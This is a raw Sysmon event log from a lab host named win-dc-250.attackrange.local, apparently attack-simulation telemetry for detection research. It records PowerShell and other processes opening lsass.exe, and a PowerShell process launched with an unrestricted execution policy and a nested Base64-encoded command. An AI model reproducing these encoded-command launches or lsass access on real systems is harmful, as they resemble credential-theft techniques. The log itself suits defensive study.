AEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.371{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.371{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.324{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_swaatqeh.4da.ps12021-01-14 13:08:47.324 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.309{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.309{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.309{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.309{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-425F-6000-DB02-000000009901}33362664C:\Windows\system32\cmd.exe{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.288{08A6967A-425F-6000-DC02-000000009901}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-425F-6000-DB02-000000009901}3336C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGI